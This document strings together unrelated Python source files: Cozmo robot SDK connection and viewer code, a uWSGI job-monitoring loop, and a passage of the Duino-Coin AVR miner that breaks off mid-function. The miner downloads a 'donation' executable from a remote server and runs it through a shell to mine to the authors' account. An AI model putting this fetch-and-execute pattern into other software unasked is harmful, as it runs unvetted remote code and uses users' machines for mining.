class FirstAvailableConnector(DeviceConnector):
'''Connects to the first Android or iOS device running the Cozmo app in SDK mode.
    This class tries a :class:`TCPConnector` (when the SDK_TCP_PORT environment
    variable is set), then an :class:`AndroidConnector` and an
    :class:`IOSConnector`, and returns the first successful connection.
This is the default connector used by ``connect_`` functions.
'''
def __init__(self):
        super().__init__(enable_env_vars=False)
self.tcp = TCPConnector()
self.ios = IOSConnector()
self.android = AndroidConnector()
    async def _do_connect(self, connector, loop, protocol_factory, conn_check):
connect = connector.connect(loop, protocol_factory, conn_check)
result = await asyncio.gather(connect, loop=loop, return_exceptions=True)
return result[0]
async def connect(self, loop, protocol_factory, conn_check):
conn_args = (loop, protocol_factory, conn_check)
tcp_result = None
if self.tcp.enabled:
tcp_result = await self._do_connect(self.tcp, *conn_args)
if not isinstance(tcp_result, BaseException):
return tcp_result
logger.warning('No TCP connection found running Cozmo: %s', tcp_result)
android_result = await self._do_connect(self.android, *conn_args)
if not isinstance(android_result, BaseException):
return android_result
ios_result = await self._do_connect(self.ios, *conn_args)
if not isinstance(ios_result, BaseException):
return ios_result
logger.warning('No iOS device found running Cozmo: %s', ios_result)
logger.warning('No Android device found running Cozmo: %s', android_result)
if isinstance(tcp_result, exceptions.SDKVersionMismatch):
raise tcp_result
if isinstance(ios_result, exceptions.SDKVersionMismatch):
raise ios_result
if isinstance(android_result, exceptions.SDKVersionMismatch):
raise android_result
raise exceptions.NoDevicesFound('No devices connected running Cozmo in SDK mode')
# Create an instance of a connector to use by default
# The instance will maintain state about which devices are currently connected.
_DEFAULT_CONNECTOR = FirstAvailableConnector()
def _sync_exception_handler(abort_future, loop, context):
loop.default_exception_handler(context)
exception = context.get('exception')
if exception is not None:
abort_future.set_exception(context['exception'])
else:
abort_future.set_exception(RuntimeError(context['message']))
class _LoopThread:
'''Takes care of managing an event loop running in a dedicated thread.
Args:
loop (:class:`asyncio.BaseEventLoop`): The loop to run
f (callable): Optional code to execute on the loop's thread
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default, it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
        abort_future (:class:`concurrent.futures.Future`): Optional future to
raise an exception on in the event of an exception occurring within
the thread.
'''
def __init__(self, loop, f=None, conn_factory=conn.CozmoConnection, connector=None, abort_future=None):
self.loop = loop
self.f = f
if not abort_future:
abort_future = concurrent.futures.Future()
self.abort_future = abort_future
self.conn_factory = conn_factory
self.connector = connector
self.thread = None
self._running = False
def start(self):
'''Start a thread and open a connection to a device.
Returns:
:class:`cozmo.conn.CozmoConnection` instance
'''
q = queue.Queue()
abort_future = concurrent.futures.Future()
def run_loop():
asyncio.set_event_loop(self.loop)
try:
coz_conn = connect_on_loop(self.loop, self.conn_factory, self.connector)
q.put(coz_conn)
except Exception as e:
self.abort_future.set_exception(e)
q.put(e)
return
if self.f:
asyncio.ensure_future(self.f(coz_conn))
self.loop.run_forever()
self.thread = threading.Thread(target=run_loop)
self.thread.start()
        try:
            # Queue.get takes (block, timeout); q.get(10) would set `block`,
            # not a timeout, and get() signals a timeout by raising
            # queue.Empty rather than by returning None.
            coz_conn = q.get(timeout=10)
        except queue.Empty:
            raise TimeoutError("Timed out waiting for connection to device")
if isinstance(coz_conn, Exception):
raise coz_conn
self.coz_conn = coz_conn
self._running = True
return coz_conn
def stop(self):
        '''Cleanly shut down the running loop and thread.'''
if self._running:
async def _stop():
await self.coz_conn.shutdown()
self.loop.call_soon(lambda: self.loop.stop())
asyncio.run_coroutine_threadsafe(_stop(), self.loop).result()
self.thread.join()
self._running = False
def abort(self, exc):
'''Abort the running loop and thread.'''
if self._running:
async def _abort(exc):
self.coz_conn.abort(exc)
asyncio.run_coroutine_threadsafe(_abort(exc), self.loop).result()
self.stop()
def _connect_async(f, conn_factory=conn.CozmoConnection, connector=None):
# use the default loop, if one is available for the current thread,
# if not create a new loop and make it the default.
#
# the expectation is that if the user wants explicit control over which
# loop the code is executed on, they'll just use connect_on_loop directly.
loop = None
try:
loop = asyncio.get_event_loop()
except:
pass
if loop is None:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
coz_conn = connect_on_loop(loop, conn_factory, connector)
try:
loop.run_until_complete(f(coz_conn))
except KeyboardInterrupt:
logger.info('Exit requested by user')
finally:
loop.run_until_complete(coz_conn.shutdown())
loop.stop()
loop.run_forever()
_sync_loop = asyncio.new_event_loop()
def _connect_sync(f, conn_factory=conn.CozmoConnection, connector=None):
abort_future = concurrent.futures.Future()
conn_factory = functools.partial(conn_factory, _sync_abort_future=abort_future)
lt = _LoopThread(_sync_loop, conn_factory=conn_factory, connector=connector, abort_future=abort_future)
_sync_loop.set_exception_handler(functools.partial(_sync_exception_handler, abort_future))
coz_conn = lt.start()
try:
f(base._SyncProxy(coz_conn))
finally:
lt.stop()
def connect_on_loop(loop, conn_factory=conn.CozmoConnection, connector=None):
'''Uses the supplied event loop to connect to a device.
Will run the event loop in the current thread until the
connection succeeds or fails.
If you do not want/need to manage your own loop, then use the
:func:`connect` function to handle setup/teardown and execute
a user-supplied function.
Args:
loop (:class:`asyncio.BaseEventLoop`): The event loop to use to
connect to Cozmo.
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default, it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
Returns:
A :class:`cozmo.conn.CozmoConnection` instance.
'''
if connector is None:
connector = _DEFAULT_CONNECTOR
factory = functools.partial(conn_factory, loop=loop)
async def conn_check(coz_conn):
await coz_conn.wait_for(conn.EvtConnected, timeout=5)
async def connect():
return await connector.connect(loop, factory, conn_check)
transport, coz_conn = loop.run_until_complete(connect())
return coz_conn
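# Sketch of caller-managed loop usage (assumes a reachable device running the
# Cozmo app; `my_coroutine` is a hypothetical user coroutine):
#
#   loop = asyncio.new_event_loop()
#   coz_conn = connect_on_loop(loop)
#   loop.run_until_complete(my_coroutine(coz_conn))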
def connect(f, conn_factory=conn.CozmoConnection, connector=None):
'''Connects to the Cozmo Engine on the mobile device and supplies the connection to a function.
Accepts a function, f, that is given a :class:`cozmo.conn.CozmoConnection` object as
a parameter.
The supplied function may be either an asynchronous coroutine function
(normally defined using ``async def``) or a regular synchronous function.
If an asynchronous function is supplied it will be run on the same thread
as the Cozmo event loop and must use the ``await`` keyword to yield control
back to the loop.
If a synchronous function is supplied then it will run on the main thread
and Cozmo's event loop will run on a separate thread. Calls to
asynchronous methods returned from CozmoConnection will automatically
be translated to synchronous ones.
    The connect function will return once the supplied function has completed,
    at which time it will terminate the connection to the robot.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
'''
if asyncio.iscoroutinefunction(f):
return _connect_async(f, conn_factory, connector)
return _connect_sync(f, conn_factory, connector)
def _connect_viewer(f, conn_factory, connector, viewer):
# Run the viewer in the main thread, with the SDK running on a new background thread.
loop = asyncio.new_event_loop()
abort_future = concurrent.futures.Future()
async def view_connector(coz_conn):
try:
await viewer.connect(coz_conn)
if inspect.iscoroutinefunction(f):
await f(coz_conn)
else:
await coz_conn._loop.run_in_executor(None, f, base._SyncProxy(coz_conn))
finally:
viewer.disconnect()
try:
if not inspect.iscoroutinefunction(f):
conn_factory = functools.partial(conn_factory, _sync_abort_future=abort_future)
lt = _LoopThread(loop, f=view_connector, conn_factory=conn_factory, connector=connector)
lt.start()
viewer.mainloop()
except BaseException as e:
abort_future.set_exception(exceptions.SDKShutdown(repr(e)))
raise
finally:
lt.stop()
def connect_with_3dviewer(f, conn_factory=conn.CozmoConnection, connector=None,
enable_camera_view=False, show_viewer_controls=True):
'''Setup a connection to a device and run a user function while displaying Cozmo's 3d world.
    This displays an OpenGL window on the screen with a 3D view of Cozmo's
    understanding of the world. Optionally, if `enable_camera_view` is True, a
    second OpenGL window will also be displayed, showing a view of Cozmo's
    camera. It will raise an error if the current system does not support
    PyOpenGL.
    The function may be either synchronous or asynchronous (defined
    using ``async def``).
The function must accept a :class:`cozmo.CozmoConnection` object as
its only argument.
This call will block until the supplied function completes.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
enable_camera_view (bool): Specifies whether to also open a 2D camera
view in a second OpenGL window.
show_viewer_controls (bool): Specifies whether to draw controls on the view.
'''
try:
from . import opengl
except ImportError as exc:
opengl = exc
if isinstance(opengl, Exception):
if isinstance(opengl, exceptions.InvalidOpenGLGlutImplementation):
raise NotImplementedError('GLUT (OpenGL Utility Toolkit) is not available:\n%s'
% opengl)
else:
raise NotImplementedError('opengl is not available; '
'make sure the PyOpenGL, PyOpenGL-accelerate and Pillow packages are installed:\n'
'Do `pip3 install --user cozmo[3dviewer]` to install. Error: %s' % opengl)
viewer = opengl.OpenGLViewer(enable_camera_view=enable_camera_view, show_viewer_controls=show_viewer_controls)
_connect_viewer(f, conn_factory, connector, viewer)
def connect_with_tkviewer(f, conn_factory=conn.CozmoConnection, connector=None, force_on_top=False):
'''Setup a connection to a device and run a user function while displaying Cozmo's camera.
This displays a Tk window on the screen showing a view of Cozmo's camera.
    It will raise an error if the current system does not support Tk.
    The function may be either synchronous or asynchronous (defined
    using ``async def``).
The function must accept a :class:`cozmo.CozmoConnection` object as
its only argument.
This call will block until the supplied function completes.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
force_on_top (bool): Specifies whether the window should be forced on top of all others
'''
try:
from . import tkview
except ImportError as exc:
tkview = exc
if isinstance(tkview, Exception):
raise NotImplementedError('tkviewer not available on this platform; '
'make sure Tkinter, NumPy and Pillow packages are installed (%s)' % tkview)
viewer = tkview.TkImageViewer(force_on_top=force_on_top)
_connect_viewer(f, conn_factory, connector, viewer)
def setup_basic_logging(general_log_level=None, protocol_log_level=None,
protocol_log_messages=clad_protocol.LOG_ALL, target=sys.stderr,
deprecated_filter="default"):
'''Helper to perform basic setup of the Python logging machinery.
The SDK defines two loggers:
* :data:`logger` ("cozmo.general") - For general purpose information
about events within the SDK; and
* :data:`logger_protocol` ("cozmo.protocol") - For low level
communication messages between the device and the SDK.
Generally only :data:`logger` is interesting.
Args:
general_log_level (str): 'DEBUG', 'INFO', 'WARN', 'ERROR' or an equivalent
constant from the :mod:`logging` module. If None then a
value will be read from the COZMO_LOG_LEVEL environment variable.
protocol_log_level (str): as general_log_level. If None then a
value will be read from the COZMO_PROTOCOL_LOG_LEVEL environment
variable.
protocol_log_messages (list): The low level messages that should be
logged to the protocol log. Defaults to all. Will read from
            the COMZO_PROTOCOL_LOG_MESSAGES environment variable if available,
            which should be a comma separated list of message names
            (case sensitive).
target (object): The stream to send the log data to; defaults to stderr
deprecated_filter (str): The filter for any DeprecationWarning messages.
This is defaulted to "default" which shows the warning once per
location. You can hide all deprecated warnings by passing in "ignore",
see https://docs.python.org/3/library/warnings.html#warning-filter
for more information.
'''
if deprecated_filter is not None:
warnings.filterwarnings(deprecated_filter, category=DeprecationWarning)
if general_log_level is None:
general_log_level = os.environ.get('COZMO_LOG_LEVEL', logging.INFO)
if protocol_log_level is None:
protocol_log_level = os.environ.get('COZMO_PROTOCOL_LOG_LEVEL', logging.INFO)
if protocol_log_level:
if 'COMZO_PROTOCOL_LOG_MESSAGES' in os.environ:
lm = os.environ['COMZO_PROTOCOL_LOG_MESSAGES']
if lm.lower() == 'all':
clad_protocol.CLADProtocol._clad_log_which = clad_protocol.LOG_ALL
else:
clad_protocol.CLADProtocol._clad_log_which = set(lm.split(','))
else:
clad_protocol.CLADProtocol._clad_log_which = protocol_log_messages
h = logging.StreamHandler(stream=target)
f = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
h.setFormatter(f)
logger.addHandler(h)
    logger.setLevel(general_log_level)
if protocol_log_level is not None:
logger_protocol.addHandler(h)
logger_protocol.setLevel(protocol_log_level)
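# Usage sketch: call setup_basic_logging() once before using connect() or
# connect_on_loop() directly, e.g.:
#   setup_basic_logging(general_log_level='DEBUG')
# run_program() below already calls it for you.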
def run_program(f, use_viewer=False, conn_factory=conn.CozmoConnection,
connector=None, force_viewer_on_top=False,
deprecated_filter="default", use_3d_viewer=False,
show_viewer_controls=True,
exit_on_connection_error=True):
'''Connect to Cozmo and run the provided program/function f.
Args:
f (callable): The function to execute, accepts a connected
:class:`cozmo.robot.Robot` as the parameter.
use_viewer (bool): Specifies whether to display a view of Cozmo's camera
in a window.
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
force_viewer_on_top (bool): Specifies whether the window should be
forced on top of all others (only relevant if use_viewer is True).
Note that this is ignored if use_3d_viewer is True (as it's not
currently supported on that windowing system).
deprecated_filter (str): The filter for any DeprecationWarning messages.
This is defaulted to "default" which shows the warning once per
location. You can hide all deprecated warnings by passing in "ignore",
see https://docs.python.org/3/library/warnings.html#warning-filter
for more information.
use_3d_viewer (bool): Specifies whether to display a 3D view of Cozmo's
understanding of the world in a window. Note that if both this and
`use_viewer` are set then the 2D camera view will render in an OpenGL
window instead of a TkView window.
show_viewer_controls (bool): Specifies whether to draw controls on the view.
        exit_on_connection_error (bool): Specifies whether the program should
            exit on a connection error; if False, the error is raised instead.
            Defaults to True.
'''
setup_basic_logging(deprecated_filter=deprecated_filter)
# Wrap f (a function that takes in an already created robot)
# with a function that accepts a cozmo.conn.CozmoConnection
if asyncio.iscoroutinefunction(f):
@functools.wraps(f)
async def wrapper(sdk_conn):
try:
robot = await sdk_conn.wait_for_robot()
await f(robot)
except exceptions.SDKShutdown:
pass
except KeyboardInterrupt:
logger.info('Exit requested by user')
else:
@functools.wraps(f)
def wrapper(sdk_conn):
try:
robot = sdk_conn.wait_for_robot()
f(robot)
except exceptions.SDKShutdown:
pass
except KeyboardInterrupt:
logger.info('Exit requested by user')
try:
if use_3d_viewer:
connect_with_3dviewer(wrapper, conn_factory=conn_factory, connector=connector,
enable_camera_view=use_viewer, show_viewer_controls=show_viewer_controls)
elif use_viewer:
connect_with_tkviewer(wrapper, conn_factory=conn_factory, connector=connector,
force_on_top=force_viewer_on_top)
else:
connect(wrapper, conn_factory=conn_factory, connector=connector)
except KeyboardInterrupt:
logger.info('Exit requested by user')
except exceptions.ConnectionError as e:
if exit_on_connection_error:
sys.exit("A connection error occurred: %s" % e)
else:
logger.error("A connection error occurred: %s" % e)
raise
|
jgi_gatewayMule.py
|
import threading
from os import environ
import uwsgi
from configparser import ConfigParser
if __name__ == '__main__' and __package__ is None:
from os import sys, path
my_dir = path.dirname(path.dirname(path.abspath(__file__)))
    print('Adding parent directory to sys.path:', my_dir)
sys.path.append(my_dir)
from jgi_gateway.staging_jobs_manager import StagingJobsManager
from jgi_gateway import utils
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'jgi_gateway'):
retconfig[nameval[0]] = nameval[1]
return retconfig
app_config = utils.validate_config(get_config())
class Looper:
def __init__(self, config):
self.in_loop = False
self.interval = 10
self.job_checks = 0
self.jobs_manager = StagingJobsManager(config)
def start_job_check_loop(self):
if self.in_loop:
return
self.in_loop = True
self.job_check_loop()
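    # job_check_loop reschedules itself on a threading.Timer every `interval`
    # seconds for as long as sync_active_jobs() reports active jobs; once none
    # remain, in_loop is cleared until the next 'start-job-monitoring' mule
    # message re-arms it via start_job_check_loop().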
def job_check_loop(self):
jobs, error = self.jobs_manager.sync_active_jobs()
if jobs:
threading.Timer(self.interval, self.job_check_loop).start()
else:
self.in_loop = False
def mule_loop():
looper = Looper(app_config)
while True:
message = uwsgi.mule_get_msg()
if message == b'start-job-monitoring':
looper.start_job_check_loop()
else:
print('unknown message:')
print(message)
# this_thread = threading.Thread(target=mule_loop)
# this_thread.daemon = True
# this_thread.start()
if __name__ == '__main__':
    # threading.Thread(target=mule_loop, daemon=True).start()
mule_loop()
|
AVR_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official AVR Miner 2.73 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from platform import system
import sys
from configparser import ConfigParser
from pathlib import Path
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from re import sub
from socket import socket
from datetime import datetime
from statistics import mean
from signal import SIGINT, signal
from time import ctime, sleep, strptime, time
from random import choice
import select
import pip
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread as thrThread
from threading import Lock as thread_lock
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
try:
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print("Pyserial is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pyserial")
install('pyserial')
try:
import requests
except ModuleNotFoundError:
print("Requests is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install requests")
install('requests')
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
def now():
return datetime.now()
def port_num(com):
return str(''.join(filter(str.isdigit, com)))
class Settings:
VER = '2.73'
SOC_TIMEOUT = 45
REPORT_TIME = 60
    AVR_TIMEOUT = 4  # ≈ (diff 6 * 100) / 196 H/s = 3.06 s per share
BAUDRATE = 115200
DATA_DIR = "Duino-Coin AVR Miner " + str(VER)
SEPARATOR = ","
ENCODING = "utf-8"
    BLOCK = " ‖ "
    PICK = ""
    COG = " @"
    if osname != "nt":
        # Windows' cmd does not support emojis, shame!
        PICK = " ⛏"
        COG = " ⚙"
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
        s.connect(pool)
return s
def send(s, msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(s, limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
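    # Usage sketch mirroring the miner's own flow further below:
    #   pool = Client.fetch_pool()
    #   s = Client.connect(pool)
    #   server_version = Client.recv(s, 6)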
def fetch_pool():
while True:
pretty_print("net0", " " + get_string("connection_search"),
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
debug_output(f"Fetched pool: {response['name']}")
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(15)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print("net0",
f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if osname == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if osname == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
elif osname == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
if donation_level <= 0:
pretty_print(
'sys0', Fore.YELLOW
+ get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning')
sleep(5)
if donation_level > 0:
debug_output(get_string('starting_donation'))
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print('sys0',
get_string('thanks_donation').replace("\n", "\n\t\t"),
'warning')
shares = [0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = {}  # per-board hashrates; update_rich_presence() sums its values
config = ConfigParser()
# Module-level lock shared by pretty_print/share_print so output from
# concurrent miner threads doesn't interleave (Lock is imported as thread_lock)
print_lock = thread_lock()
mining_start_time = time()
if not path.exists(Settings.DATA_DIR):
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + '/Translations.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url)
with open(Settings.DATA_DIR + '/Translations.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(Settings.DATA_DIR + '/Translations.json', 'r',
encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
try:
if not Path(Settings.DATA_DIR + '/Settings.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
else:
lang = 'english'
else:
try:
config.read(Settings.DATA_DIR + '/Settings.cfg')
lang = config["AVR Miner"]['language']
except Exception:
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return ' String not found: ' + string_name
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
        val = str(round((val / 1_000), accuracy)) + " k"
else:
if symbol:
val = str(round(val)) + " "
else:
val = str(round(val))
return val + symbol
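# e.g. get_prefix("H/s", 1_234, 2) -> "1.23 kH/s"
#      get_prefix("", 196, 0)      -> "196"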
def debug_output(text: str):
if debug == 'y':
print(Style.RESET_ALL + Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ Style.NORMAL + f'DEBUG: {text}')
def title(title: str):
if osname == 'nt':
"""
Changing the title in Windows' cmd
is easy - just use the built-in
title command
"""
ossystem('title ' + title)
else:
"""
Most *nix terminals use
this escape sequence to change
the console window title
"""
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
def handler(signal_received, frame):
pretty_print(
'sys0', get_string('sigint_detected')
+ Style.NORMAL + Fore.RESET
+ get_string('goodbye'), 'warning')
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
global username
global donation_level
global avrport
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
if not Path(str(Settings.DATA_DIR) + '/Settings.cfg').is_file():
print(
Style.BRIGHT + get_string('basic_config_tool')
+ Settings.DATA_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL + get_string('dont_have_account')
+ Fore.YELLOW + get_string('wallet') + Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET + Style.BRIGHT)
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT + Fore.RESET
+ ' ' + str(port))
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET + Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET + Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL + Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET + Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET + Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET + Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
        if float(donation_level) > 5:
            donation_level = 5
        if float(donation_level) < 0:
            donation_level = 0
donation_level = int(donation_level)
config["AVR Miner"] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 4,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y"}
with open(str(Settings.DATA_DIR)
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
else:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg')
username = config["AVR Miner"]['username']
avrport = config["AVR Miner"]['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = int(config["AVR Miner"]['donate'])
debug = config["AVR Miner"]['debug']
rig_identifier = config["AVR Miner"]['identifier']
Settings.SOC_TIMEOUT = int(config["AVR Miner"]["soc_timeout"])
Settings.AVR_TIMEOUT = float(config["AVR Miner"]["avr_timeout"])
discord_presence = config["AVR Miner"]["discord_presence"]
shuffle_ports = config["AVR Miner"]["shuffle_ports"]
Settings.REPORT_TIME = int(config["AVR Miner"]["periodic_report"])
def greeting():
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string('banner')
+ Style.RESET_ALL + Fore.MAGENTA
+ f' {Settings.VER}' + Fore.RESET
+ ' 2019-2021')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL + Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + lang.capitalize()
+ " translation: " + Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('avr_on_port')
+ Style.BRIGHT + Fore.YELLOW
+ ' '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM + Fore.MAGENTA + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string('donation_level') + Style.BRIGHT
